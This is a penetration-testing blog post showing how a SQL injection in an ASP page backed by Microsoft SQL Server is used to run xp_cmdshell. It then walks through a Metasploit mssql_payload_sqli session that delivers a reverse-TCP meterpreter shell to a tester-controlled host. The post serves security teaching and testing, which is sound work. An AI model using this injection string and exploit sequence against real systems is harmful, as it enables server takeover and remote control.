Penetration testing - SQL injection and Metasploit

imagensecforcepost.png

In this post we are going to show how to exploit a SQL injection vulnerability on a web application using Microsoft SQL server backend where xp_cmdshell is available to the attacker.

Given a penetration test to a web application it is identified that it is vulnerable to SQL injection attacks and the penetration tester can execute administrative stored procedures:

http://192.168.1.66/showproduct.asp?id=1;exec master..xp_cmdshell 'ping 192.168.1.64’;–

If the request shown above is successful then arbitrary commands could be executed in the host. At this point, there are a number of options that would allow the tester to fully compromise the server. There are public tools which could aid the attacker to automate the take over process. This post will cover the use of a Metasploit module.

The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute meterpreter which is one of the payloads that offers great flexibility to the penetration tester.

It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by entering the GET_PATH variable with an [SQLi] token. The token will be the place where the payload will be executed. The rest of the exploitation process is the same as any other vulnerability, this is the exploitation based on the URL shown above:

set GET_PATH http://192.168.1.66/showproduct.asp?id=1;[SQLi];--

GET_PATH => http://192.168.1.66/showproduct.asp?id=1;[SQLi];--

msf exploit(mssql_payload_sqli) > set RHOST 192.168.1.66

RHOST => 192.168.1.66

msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp

PAYLOAD => windows/patchupmeterpreter/reverse_tcp

msf exploit(mssql_payload_sqli) > set LHOST 192.168.1.64

LHOST => 192.168.1.64

msf exploit(mssql_payload_sqli) > set LPORT 80

LPORT => 80

msf exploit(mssql_payload_sqli) > exploit

After the exploitation the attacker will get a meterpreter shell.

sqlinjection2.png

If you want to use this code you can download it from SECFORCE GitHub repository.

You may also be interested in...

imagensecforcepost.png
Nov. 3, 2008

Black box penetration testing vs white box penetration testing

Differences between black box and white box penetration tests

See more
imagensecforcepost.png
Dec. 14, 2012

Is traditional penetration testing effective at identifying risk?

The challenge for many board members is how to ascertain the validity of what they are being told in relation to the health of their defences. What unknown risks are being carried? There is a high risk of false assurance from internal departments reporting up the chain.

See more